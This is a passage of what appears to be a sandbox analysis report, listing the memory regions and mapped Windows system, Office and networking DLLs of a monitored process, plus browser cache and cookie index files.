0x77c3efff entry_point = 0x77b20000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3968 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3969 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3970 start_va = 0x7fef8370000 end_va = 0x7fef8559fff entry_point = 0x7fef8370000 region_type = mapped_file name = "c2r64.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\C2R64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll") Region: id = 3971 start_va = 0x7fef8560000 end_va = 0x7fef8799fff entry_point = 0x7fef8560000 region_type = mapped_file name = "appvisvsubsystems64.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll") Region: id = 3972 start_va = 0x7fefaa80000 end_va = 0x7fefaa82fff entry_point = 0x7fefaa80000 region_type = mapped_file name = "api-ms-win-crt-utility-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-utility-l1-1-0.dll") Region: id = 3973 start_va = 0x7fefaa90000 end_va = 0x7fefaa92fff entry_point = 0x7fefaa90000 region_type = mapped_file name = "api-ms-win-crt-environment-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-environment-l1-1-0.dll") Region: id = 3974 start_va = 0x7fefaaa0000 end_va = 0x7fefaaa2fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "api-ms-win-crt-filesystem-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-filesystem-l1-1-0.dll") Region: id = 3975 start_va = 0x7fefaab0000 end_va = 0x7fefaab2fff entry_point = 0x7fefaab0000 region_type = mapped_file name = "api-ms-win-crt-time-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-time-l1-1-0.dll") Region: id = 3976 start_va = 0x7fefaac0000 end_va = 0x7fefaac4fff entry_point = 0x7fefaac0000 region_type = mapped_file name = "api-ms-win-crt-multibyte-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-multibyte-l1-1-0.dll") Region: id = 3977 start_va = 0x7fefaad0000 end_va = 0x7fefaad4fff entry_point = 0x7fefaad0000 region_type = mapped_file name = "api-ms-win-crt-math-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-math-l1-1-0.dll") Region: id = 3978 start_va = 0x7fefaae0000 end_va = 0x7fefaae2fff entry_point = 0x7fefaae0000 region_type = mapped_file name = "api-ms-win-crt-locale-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-locale-l1-1-0.dll") Region: id = 3979 start_va = 0x7fefaaf0000 end_va = 0x7fefab8bfff entry_point = 0x7fefaaf0000 region_type = mapped_file name = "msvcp140.dll" filename = "\\Windows\\System32\\msvcp140.dll" (normalized: "c:\\windows\\system32\\msvcp140.dll") Region: id = 3980 start_va = 0x7fefab90000 end_va = 0x7fefab93fff entry_point = 0x7fefab90000 region_type = mapped_file name = "api-ms-win-crt-convert-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-convert-l1-1-0.dll") Region: id = 3981 start_va = 0x7fefaba0000 end_va = 0x7fefaba3fff entry_point = 0x7fefaba0000 region_type = mapped_file name = "api-ms-win-crt-stdio-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-stdio-l1-1-0.dll") Region: id = 3982 start_va = 0x7fefabb0000 end_va = 0x7fefabb2fff entry_point = 0x7fefabb0000 region_type = mapped_file name = "api-ms-win-crt-heap-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-heap-l1-1-0.dll") Region: id = 3983 start_va = 0x7fefabc0000 end_va = 0x7fefabc3fff entry_point = 0x7fefabc0000 region_type = mapped_file name = "api-ms-win-crt-string-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-string-l1-1-0.dll") Region: id = 3984 start_va = 0x7fefabd0000 end_va = 0x7fefabd2fff entry_point = 0x7fefabd0000 region_type = mapped_file name = "api-ms-win-core-file-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l1-2-0.dll") Region: id = 3985 start_va = 0x7fefabe0000 end_va = 0x7fefabe2fff entry_point = 0x7fefabe0000 region_type = mapped_file name = "api-ms-win-core-processthreads-l1-1-1.dll" filename = "\\Windows\\System32\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-processthreads-l1-1-1.dll") Region: id = 3986 start_va = 0x7fefabf0000 end_va = 0x7fefabf2fff entry_point = 0x7fefabf0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 3987 start_va = 0x7fefac00000 end_va = 0x7fefac02fff entry_point = 0x7fefac00000 region_type = mapped_file name = "api-ms-win-core-localization-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-localization-l1-2-0.dll") Region: id = 3988 start_va = 0x7fefac10000 end_va = 0x7fefac12fff entry_point = 0x7fefac10000 region_type = mapped_file name = "api-ms-win-core-file-l2-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l2-1-0.dll") Region: id = 3989 start_va = 0x7fefac20000 end_va = 0x7fefac22fff entry_point = 0x7fefac20000 region_type = mapped_file name = "api-ms-win-core-timezone-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-timezone-l1-1-0.dll") Region: id = 3990 start_va = 0x7fefac30000 end_va = 0x7fefad21fff entry_point = 0x7fefac30000 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 3991 start_va = 0x7fefad30000 end_va = 0x7fefad33fff entry_point = 0x7fefad30000 region_type = mapped_file name = "api-ms-win-crt-runtime-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-runtime-l1-1-0.dll") Region: id = 3992 start_va = 0x7fefad40000 end_va = 0x7fefad55fff entry_point = 0x7fefad40000 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Windows\\System32\\vcruntime140.dll" (normalized: "c:\\windows\\system32\\vcruntime140.dll") Region: id = 3993 start_va = 0x7fefcf30000 end_va = 0x7fefcf4dfff entry_point = 0x7fefcf30000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 3994 start_va = 0x7fefdb90000 end_va = 0x7fefdb9efff entry_point = 0x7fefdb90000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 3995 start_va = 0x7fefdd60000 end_va = 0x7fefddcafff entry_point = 0x7fefdd60000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3996 start_va = 0x7fefdf60000 end_va = 0x7fefdfc6fff entry_point = 0x7fefdf60000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3997 start_va = 0x7fefdfd0000 end_va = 0x7fefed57fff entry_point = 0x7fefdfd0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 3998 start_va = 0x7fefed60000 end_va = 0x7fefed8dfff entry_point = 0x7fefed60000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3999 start_va = 0x7feff0e0000 end_va = 0x7feff1bafff entry_point = 0x7feff0e0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4000 start_va = 0x7feff1c0000 end_va = 0x7feff1defff entry_point = 0x7feff1c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4001 start_va = 0x7feff1e0000 end_va = 0x7feff2e8fff entry_point = 0x7feff1e0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 4002 start_va = 0x7feff4d0000 end_va = 0x7feff598fff entry_point = 0x7feff4d0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 4003 start_va = 0x7feff5a0000 end_va = 0x7feff63efff entry_point = 0x7feff5a0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4004 start_va = 0x7feff640000 end_va = 0x7feff6b0fff entry_point = 0x7feff640000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 4005 start_va = 0x7feff860000 end_va = 0x7feff86dfff entry_point = 0x7feff860000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 4006 start_va = 0x7feffa40000 end_va = 0x7feffc42fff entry_point = 0x7feffa40000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 4007 start_va = 0x7feffc50000 end_va = 0x7feffd7cfff entry_point = 0x7feffc50000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4008 start_va = 0x7feffd80000 end_va = 0x7feffe56fff entry_point = 0x7feffd80000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4136 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 4137 start_va = 0x1e0000 end_va = 0x1e6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 4138 start_va = 0x200000 end_va = 0x201fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 4139 start_va = 0x1ba0000 end_va = 0x1e6efff entry_point = 0x1ba0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4140 start_va = 0x1e70000 end_va = 0x2262fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e70000" filename = "" Region: id = 4141 start_va = 0x37c80000 end_va = 0x37c8ffff entry_point = 0x0 region_type = private name = "private_0x0000000037c80000" filename = "" Region: id = 4142 start_va = 0x7febdd50000 end_va = 0x7febdd5ffff entry_point = 0x0 region_type = private name = "private_0x000007febdd50000" filename = "" Region: id = 4226 start_va = 0x210000 end_va = 0x210fff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 4227 start_va = 0x220000 end_va = 0x220fff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 4228 start_va = 0x7fefa750000 end_va = 0x7fefaa65fff entry_point = 0x7fefa750000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 4229 start_va = 0x7fefda80000 end_va = 0x7fefda8efff entry_point = 0x7fefda80000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 4400 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 4401 start_va = 0x240000 end_va = 0x240fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 4402 start_va = 0x2270000 end_va = 0x236ffff entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 4403 start_va = 0x2370000 end_va = 0x244efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 4404 start_va = 0x24f0000 end_va = 0x256ffff entry_point = 0x0 region_type = private name = "private_0x00000000024f0000" filename = "" Region: id = 4405 start_va = 0x2570000 end_va = 0x266ffff entry_point = 0x0 region_type = private name = "private_0x0000000002570000" filename = "" Region: id = 4406 start_va = 0x2670000 end_va = 0x276ffff entry_point = 0x0 region_type = private name = "private_0x0000000002670000" filename = "" Region: id = 4407 start_va = 0x2770000 end_va = 0x282ffff entry_point = 0x2770000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 4408 start_va = 0x2870000 end_va = 0x296ffff entry_point = 0x0 region_type = private name = "private_0x0000000002870000" filename = "" Region: id = 4409 start_va = 0x2a70000 end_va = 0x2a7ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a70000" filename = "" Region: id = 4410 start_va = 0x2aa0000 end_va = 0x2b9ffff entry_point = 0x0 region_type = private name = "private_0x0000000002aa0000" filename = "" Region: id = 4411 start_va = 0x2c20000 end_va = 0x2d1ffff entry_point = 0x0 region_type = private name = "private_0x0000000002c20000" filename = "" Region: id = 4412 start_va = 0x2dd0000 end_va = 0x2ecffff entry_point = 0x0 region_type = private name = "private_0x0000000002dd0000" filename = "" Region: id = 4413 start_va = 0x2f30000 end_va = 0x302ffff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 4414 start_va = 0x77e10000 end_va = 0x77e12fff entry_point = 0x77e10000 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll") Region: id = 4415 start_va = 0x7fef59c0000 end_va = 0x7fef59cbfff entry_point = 0x7fef59c0000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 4416 start_va = 0x7fef5ff0000 end_va = 0x7fef6063fff entry_point = 0x7fef5ff0000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 4417 start_va = 0x7fef7190000 end_va = 0x7fef71f3fff entry_point = 0x7fef7190000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 4418 start_va = 0x7fef7200000 end_va = 0x7fef7270fff entry_point = 0x7fef7200000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 4419 start_va = 0x7fef9660000 end_va = 0x7fef9677fff entry_point = 0x7fef9660000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 4420 start_va = 0x7fef9680000 end_va = 0x7fef9690fff entry_point = 0x7fef9680000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 4421 start_va = 0x7fefa530000 end_va = 0x7fefa74cfff entry_point = 0x7fefa530000 region_type = mapped_file name = "office.odf" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 4422 start_va = 0x7fefb670000 end_va = 0x7fefb67afff entry_point = 0x7fefb670000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 4423 start_va = 0x7fefb680000 end_va = 0x7fefb6a6fff entry_point = 0x7fefb680000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 4424 start_va = 0x7fefb800000 end_va = 0x7fefb814fff entry_point = 0x7fefb800000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 4425 start_va = 0x7fefc4b0000 end_va = 0x7fefc505fff entry_point = 0x7fefc4b0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4426 start_va = 0x7fefd080000 end_va = 0x7fefd089fff entry_point = 0x7fefd080000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 4427 start_va = 0x7fefd180000 end_va = 0x7fefd1c6fff entry_point = 0x7fefd180000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4428 start_va = 0x7fefd480000 end_va = 0x7fefd496fff entry_point = 0x7fefd480000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 4429 start_va = 0x7fefda20000 end_va = 0x7fefda2afff entry_point = 0x7fefda20000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 4430 start_va = 0x7fefda50000 end_va = 0x7fefda74fff entry_point = 0x7fefda50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 4431 start_va = 0x7fefdb70000 end_va = 0x7fefdb83fff entry_point = 0x7fefdb70000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 4432 start_va = 0x7fefee30000 end_va = 0x7fefee7cfff entry_point = 0x7fefee30000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4433 start_va = 0x7feff9a0000 end_va = 0x7feffa38fff entry_point = 0x7feff9a0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 4434 start_va = 0x7feffec0000 end_va = 0x7feffec7fff entry_point = 0x7feffec0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4435 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 4436 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 4437 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 4438 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 4439 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 4440 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 4441 start_va = 0x24c0000 end_va = 0x24cffff entry_point = 0x0 region_type = private name = "private_0x00000000024c0000" filename = "" Region: id = 4442 start_va = 0x2970000 end_va = 0x2a6ffff entry_point = 0x0 region_type = private name = "private_0x0000000002970000" filename = "" Region: id = 4443 start_va = 0x3140000 end_va = 0x323ffff entry_point = 0x0 region_type = private name = "private_0x0000000003140000" filename = "" Region: id = 4444 start_va = 0x7fef9190000 end_va = 0x7fef922ffff entry_point = 0x7fef9190000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll") Region: id = 4445 start_va = 0x7fefdce0000 end_va = 0x7fefdd15fff entry_point = 0x7fefdce0000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 4446 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 4447 start_va = 0x250000 end_va = 0x250fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 4448 start_va = 0x33e0000 end_va = 0x34dffff entry_point = 0x0 region_type = private name = "private_0x00000000033e0000" filename = "" Region: id = 4449 start_va = 0x3550000 end_va = 0x364ffff entry_point = 0x0 region_type = private name = "private_0x0000000003550000" filename = "" Region: id = 4450 start_va = 0x3650000 end_va = 0x3992fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003650000" filename = "" Region: id = 4451 start_va = 0x7fefbb00000 end_va = 0x7fefbb2cfff entry_point = 0x7fefbb00000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 4452 start_va = 0x7fefc080000 end_va = 0x7fefc097fff entry_point = 0x7fefc080000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 4453 start_va = 0x7fefcd50000 end_va = 0x7fefcd5bfff entry_point = 0x7fefcd50000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 4454 start_va = 0x7fefdc30000 end_va = 0x7fefdc3efff entry_point = 0x7fefdc30000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 4455 start_va = 0x7fefddf0000 end_va = 0x7fefdf56fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 4456 start_va = 0x7fefee80000 end_va = 0x7feff0d8fff entry_point = 0x7fefee80000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 4457 start_va = 0x7feff6e0000 end_va = 0x7feff857fff entry_point = 0x7feff6e0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 4458 start_va = 0x7feff870000 end_va = 0x7feff999fff entry_point = 0x7feff870000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 4459 start_va = 0x7feffe60000 end_va = 0x7feffeb1fff entry_point = 0x7feffe60000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 4460 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 4461 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 4462 start_va = 0x260000 end_va = 0x261fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 4463 start_va = 0x270000 end_va = 0x27bfff entry_point = 0x270000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 4464 start_va = 0x2450000 end_va = 0x2451fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002450000" filename = "" Region: id = 4465 start_va = 0x2460000 end_va = 0x2467fff entry_point = 0x2460000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 4466 start_va = 0x2470000 end_va = 0x247ffff entry_point = 0x2470000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 4467 start_va = 0x3330000 end_va = 0x33affff entry_point = 0x0 region_type = private name = "private_0x0000000003330000" filename = "" Region: id = 4468 start_va = 0x39f0000 end_va = 0x3aeffff entry_point = 0x0 region_type = private name = "private_0x00000000039f0000" filename = "" Region: id = 4469 start_va = 0x3b10000 end_va = 0x3c0ffff entry_point = 0x0 region_type = private name = "private_0x0000000003b10000" filename = "" Region: id = 4470 start_va = 0x7fef4d40000 end_va = 0x7fef4d5bfff entry_point = 0x7fef4d40000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 4471 start_va = 0x7fef4d60000 end_va = 0x7fef4dc1fff entry_point = 0x7fef4d60000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 4472 start_va = 0x7fef6570000 end_va = 0x7fef6580fff entry_point = 0x7fef6570000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 4473 start_va = 0x7fefc690000 end_va = 0x7fefc883fff entry_point = 0x7fefc690000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 4474 start_va = 0x7fefd2a0000 end_va = 0x7fefd2fafff entry_point = 0x7fefd2a0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 4475 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 4476 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 4477 start_va = 0x2480000 end_va = 0x2480fff entry_point = 0x0 region_type = pagefile_backed name = 